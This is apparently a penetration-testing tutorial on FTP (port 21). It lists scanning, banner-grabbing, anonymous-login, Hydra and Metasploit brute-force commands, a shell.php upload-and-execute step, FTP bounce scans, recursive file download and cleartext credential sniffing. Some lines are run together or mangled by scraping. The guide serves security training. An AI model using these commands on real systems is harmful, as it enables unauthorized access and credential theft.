Port 21 – FTP
Pentesting FTP
Discovery and Enumeration
Several tools and techniques exist to discover FTP across a network or a specific device, such as a web application server. The commands and tools below identify whether port 21 is open and an FTP service is running. It is also essential to obtain the FTP service banner, as this will help you find publicly available exploits for the specific product or version of FTP.
##Nmap
sudo nmap -p 21 10.1.1.1 #Simple Nmap command to scan a specific target for open port 21
sudo nmap -p 21 -sV 10.1.1.1 #A a more detailed scan that also tries to determine the service and version running
sudo nmap -p 21 10.1.1.0/24 #Scan a subnet for open FTP ports
sudo nmap -p 21 -iL targets.txt #Scan a file of IPs for open FTP ports
##Netexec
nxc ftp 10.1.1.1 #Scan a single host for FTP services enabled on a host
nxc ftp 10.1.1.0/24 #Scan a subnet for FTP services enabled
##Powershell
Test-NetConnection -ComputerName 10.1.1.1 -Port 21 #Powershell Test-NetConnection cmdlet to scan a host for open FTP port
1..255 | %{ $ip="10.1.1.$_"; if (Test-NetConnection -ComputerName $ip -Port 21 -WarningAction SilentlyContinue).TcpTestSucceeded { "$ip : Port 21 open" } else { "$ip : Port 21 closed" } } #Powershell Test-NetConnection cmdlet to scan a subnet for open FTP port
##Metasploit
msf > use auxiliary/scanner/ftp/ftp_version
set RHOSTS 10.1.1.0/24
set THREADS 50
run #Scans a range of IP addresses and determines the version of any FTP servers that are running
##Masscan
masscan -p21 10.1.1.1 #Scan a single host for open FTP
masscan -p21 10.1.1.0/24 #Scan a network subnet for open FTP ports
masscan -p21 10.1.1.0/24 --banners #Scan a network subnet for open FTP ports and retrieve banners
##Netcat (nc)
nc 10.1.1.1 21 #Test if port 21 is open on a target
##Telnet
telnet 10.1.1.1 21 #Test if port 21 is open on a target
Nmap Scan
Use nmap to enumerate FTP services:
nmap -p 21 --script ftp* 10.1.1.1
This will check for anonymous login, FTP bounce attacks, and other vulnerabilities. You can also perform a more aggressive scan with version detection:
nmap -p 21 -sV -A 10.1.1.1
Perform an unauthenticated scan for additional enumeration:
sudo nmap -sV -p21 -sC -A 10.1.1.1
Banner Grabbing
Identify the FTP server version:
echo "QUIT" | nc -nv 10.1.1.1 21 nmap -p 21 --script banner 10.1.1.1
You can try using the HELP and FEAT commands to obtain more information:
HELP FEAT
Directory Enumeration
Check for readable directories:
ls -la
Test if the account has write permissions:
mkdir test
Anonymous Access
Check if anonymous login is enabled:
ftp 10.1.1.1 Name: anonymous Password: anonymous
If successful, you can list all files with:
ls -la
You can download a file with:
get <file>
Exploitation
Finding Public Exploits
In this phase, you will have identified open port 21 and confirmed that an FTP service is running on it (Remember, FTP can run on non-standard ports—a popular one is 2121). You will also have performed banner grabbing using the tools and commands above. If the FTP service is misconfigured with banner disclosure, you can check for publicly available exploits for the specific version.
##Searchsploit searchsploit FTP #Returns all exploit titles containing FTP including the exploit ID searchsploit vsftpd 2.3.4 #Returns specific exploit titles for the service name and version including the exploit ID searchsploit 17491 -examine #Returns details for the exploit ID obtained above
All FTP-related exploits found in the Exploit Database can be listed using the following: https://www.exploit-db.com/search?q=FTP
Nmap scripts can be used to test for common FTP issues and vulnerabilities:
sudo nmap -sTCV --script ftp-* -Pn -p 21 10.1.1.1 #Run all FTP nmap scripts agains the target sudo nmap -sTCV –-script=ftp-anon,tftp-enum -p 21 10.1.1.1 #Running specific FTP Nmap scripts against the target (Anonymous login checks and user enumeration)
FTP Brute Force
The FTP service protocol is susceptible to brute-force attacks. You can attempt a brute-force attack against the identified usernames from the above techniques or use a list of username:password combinations. A good FTP username and password list can be found here:
Metasploit can perform an FTP login sweep using the following. I modified the ftp-betterdafaultpasslist so that a space separates the usernames and passwords and not : which is required for Metasploit. There are other options to brute force a single username if you have identified any valid ones.
##Metasploit sudo msfconsole -q use auxiliary/scanner/ftp/ftp_login set ANONYMOUS_LOGIN true set BLANK_PASSWORDS true set USER_AS_PASS true set USERPASS_FILE ftp_bruteforce.txt set RHOSTS 10.1.1.1 exploit
Hydra is a popular tool for brute-forcing several protocols, including FTP. It can be found here: https://github.com/vanhauser-thc/thc-hydra
##Hydra hydra -l 'anonymous' -p 'anonymous' ftp://10.1.1.1 #Test for anonymous login on the target FTP server. hydra -l <username> -P /path/to/passwords.txt 10.1.1.1 ftp #Brute force FTP with a single username and a list of passwords hydra -L /path/to/usernames.txt -P /path/to/passwords.txt 10.1.1.1 ftp #Brute force FTP with a list of usernames with all passwords in a list of passwords hydra -C ~/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.1.1.1 #Brute force FTP username and password combo list against the target FTP server hydra -C ~/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 10.1.1.1 ftp #Brute force FTP username and password combo against the target FTP server
Exploiting Misconfigurations
If write permissions are enabled, you can upload a file:
ftp 10.1.1.1 put shell.php
If the FTP server is tied to a web server, you can attempt to execute the uploaded file with the following:
http://10.1.1.1/shell.php
FTP Bounce Attack
Some FTP servers allow port scanning through FTP bounce attacks. You can use this to port scan the internal network or mask your scans:
nmap -Pn -v -p 21 -b anonymous:[email protected] 10.2.2.2
Downloading All Files from FTP
Download all FTP files recursively:
wget -m ftp://anonymous:[email protected] wget -r --user="USERNAME" --password="PASSWORD" ftp://10.1.1.1/ #If the username/password has special characters
Credential Capture
FTP does not encrypt its data and control connections. The user name and password are transmitted in clear text and may be intercepted by a network sniffer or a man-in-the-middle attack. If you have compromised a host on the network or have access to the network and can create a man-in-the-middle setup, you can use a tool like WireShark to sniff traffic and collect credentials for FTP.
Capturing network traffic and filtering for the FTP protocol will allow you to follow the TCP stream and view the credentials used to connect to the destination IP.